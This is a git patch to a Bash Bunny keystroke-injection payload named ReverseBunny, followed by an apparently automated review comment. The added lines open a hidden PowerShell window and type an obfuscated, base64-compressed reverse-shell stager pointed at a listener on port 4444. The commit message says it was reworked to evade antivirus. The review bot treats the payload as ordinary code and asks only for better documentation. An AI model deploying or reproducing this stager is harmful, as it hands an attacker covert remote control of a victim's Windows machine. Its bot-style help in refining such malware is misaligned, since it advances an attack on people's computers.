From da3c27ddea27bf89e168d2c71517650abe79e2fa Mon Sep 17 00:00:00 2001
From: 0iphor13 <79219148+0iphor13@users.noreply.github.com>
Date: Mon, 29 Nov 2021 17:52:03 +0100
Subject: [PATCH] Updated ReverseBunny to version 1.2

Updated ReverseBunny to version 1.2.

- Deleted payload on disk because of AV
- Added custom shell design
---
 .../remote_access/ReverseBunny/payload.txt | 67 ++++++++-----------
 1 file changed, 29 insertions(+), 38 deletions(-)

diff --git a/payloads/library/remote_access/ReverseBunny/payload.txt b/payloads/library/remote_access/ReverseBunny/payload.txt
index 945fac51..d0b85c3a 100644
--- a/payloads/library/remote_access/ReverseBunny/payload.txt
+++ b/payloads/library/remote_access/ReverseBunny/payload.txt
@@ -3,53 +3,44 @@
 # Title: ReverseBunny
 # Description: Get remote access using obfuscated powershell code - If caught by AV, feel free to contact me.
 # Author: 0iphor13
-# Version: 1.1
+# Version: 1.2
 # Category: Remote_Access
-# Attackmodes: HID, Storage
+# Attackmodes: HID
 LED SETUP
-GET SWITCH_POSITION
+#GET SWITCH_POSITION
 DUCKY_LANG de
-rm /root/udisk/DONE
-
-ATTACKMODE HID STORAGE
-
-#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING
-
-LED STAGE1
+ATTACKMODE HID
+#WAIT_FOR_PRESENT Your_Device
 DELAY 5000
-RUN WIN "powershell -NoP -NonI -W hidden -Exec Bypass"
-DELAY 6000
+Q GUI r
+DELAY 5000
+Q STRING "powershell -NoP -NonI -W hidden"
+DELAY 5000
+Q ENTER
-Q STRING "Set-Clipboard -Value (gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\RevBunny.txt'))"
-DELAY 10000
-Q ENTER
-DELAY 10000
-Q CONTROL v
-DELAY 10000
-Q ENTER
 DELAY 1000
-
-LED STAGE2
-
-until [ -f /root/udisk/DONE ]
- do
- sleep 0.2
-done
-
-LED CLEANUP
-
-rm /root/udisk/DONE
-
-DELAY 100
-
-sync
-
-DELAY 100
+Q STRING "\$I='0.0.0.0';\$P=4444;&(\$SHellid[1]+\$shELlId[13]+'x')(NEw-ObJECt sYstem.iO.coMPRESsIOn.dEFLateSTReAm([sYstEM.I"
+DELAY 1000
+Q STRING "o.MEmORyStReAm] [sYstEM.cOnvErT]::frOMBasE64sTrIng('jVJhb9owEP3c/IpT5A1HBUNXdR8apWqJPBSNUdSkWyuCogAWpAIHJa5K2vS/72yaqeoH"
+DELAY 1000
+Q STRING "urN8nH3Pz88vkNmjlJV3aVsWHB3ROEmSrgNgFl6LtbxmYTsJTisxAQfiE4RVawTEBxg+QSBDnXSh29yz/8WRmHM6NQjd3Xf+ZT2RAaPbBX1LDIjEqoYWvh1R"
+DELAY 1000
+Q STRING "9X6lueq30UJgk83QGmIsENWN4fe+0h2IzTFoNOhcw4ehd6wYc5zERm2MSFNhjW1NiknPfaNtOnWT9Q4yHPoKn4Umbhj6FUAv267y4uT0/xmMzDcGa1yIsoQJ"
+DELAY 1000
+Q STRING "l0oUU1A5zHOpMvkoGGOWZV+6lkWG6Tpd+4+lyjfgwSQSO8W4nOeLTC6n5+dXoR8EbCBUv1KipMT8MR19cO5J/tTJ+w/cVxDel4pv2IgrFl7Pf3JVssgf"
+DELAY 1000
+Q STRING "++sA76YkaJOx45LSI3NNFUaFuNpQvcOeikwJ+l5Fu9d+v2RDIZdq5biTGSqYTKdk5vUY+352dnpWf3npvbpPq2AoKCWZh3w3PF2gSk0yw6OjZbRynI4U0HN"
+DELAY 1000
+Q STRING 
"eXLLw6AhFX/cfhB9BJ7rfilG64VDel5H4xSJxp5h5ceOAY/Sqm0Au31gzlP3s0UzcAVnAt4uvJ3V+qzr4pmw0wN7OI8/Hdl/bdDkOwT6myNAZ5vNUZbl02DZ"
+DELAY 1000
+Q STRING "Vq2P7AmyXVB6dKO23+OA33srR8Iij4Ttj058i0DZVWkHFhlwO8F268WN9G66o8+qitf46Dzl1rL8='),[Io.COmpressIoN.coMPressiONmoDe]::decOMp"
+DELAY 1000
+Q STRING "ReSS ) | %{ NEw-ObJECt systEm.io.STREAmReadEr(\$_ , [sysTeM.TExt.encODIng]::AscIi)}| % {\$_.readTOeNd()} )"
+DELAY 1000
+Q ENTER
 LED FINISH
-
-#SAVE TO EJECT
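Review bot: The code that actually runs is an opaque base64/deflate blob split across nine `Q STRING` lines, so nothing in the hunk lets a reader verify that what gets typed matches the `# Description` line. Because the commit also drops the on-disk copy that previously held the readable script, the repository no longer carries any auditable form of this payload; keeping the decoded source next to the file, or a header comment such as `# Source: <path to the readable script this blob was generated from>`, would let reviewers and the project's own users confirm the blob's contents. The header block was updated for `# Version` and `# Attackmodes` but still does not document that the first `Q STRING` line embeds the only per-deployment values, which is worth a one-line comment there for the same reason.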